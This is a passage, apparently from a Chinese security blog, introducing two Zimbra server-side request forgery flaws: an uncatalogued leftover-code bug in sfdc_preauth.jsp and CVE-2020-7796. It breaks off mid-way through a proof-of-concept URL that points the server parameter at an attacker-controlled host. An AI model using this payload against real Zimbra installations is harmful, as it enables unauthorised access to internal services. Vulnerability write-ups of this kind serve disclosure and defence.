zimbra两个最新的ssrf漏洞细节

    越南安全研究者tint0在《POPPING 0DAYS OUT OF A THICK——JAVA APP——A DIVE INTO ZIMBRA》中提到了两个SSRF漏洞，一个是著名的CVE-2019-9621，它已经被黑客广泛利用，这里不再赘述；另一个因为官方选择不回复，因此这个ssrf漏洞至今没有CVE编号，官方一直没给出补丁，也没有文章披露它的技术细节，这篇文章会说一下它的技术细节。tint0在PPT中提到的两个SSRF漏洞如下图所示。    以及，2020年爆出另一个CVE-2020-7796也是SSRF漏洞，这篇文章也会说一下它。接下来，开始我们的正文内容。    一、漏洞POC    1. Left-over code SSRF    该SSRF漏洞没有CVE编号，出现漏洞的脚本位于/service/error/sfdc_preauth.jsp，先给出漏洞的POC代码：/service/error/sfdc_preauth.jsp?session=s&userid=1&server=vps的ip:port%23.salesforc ………………………………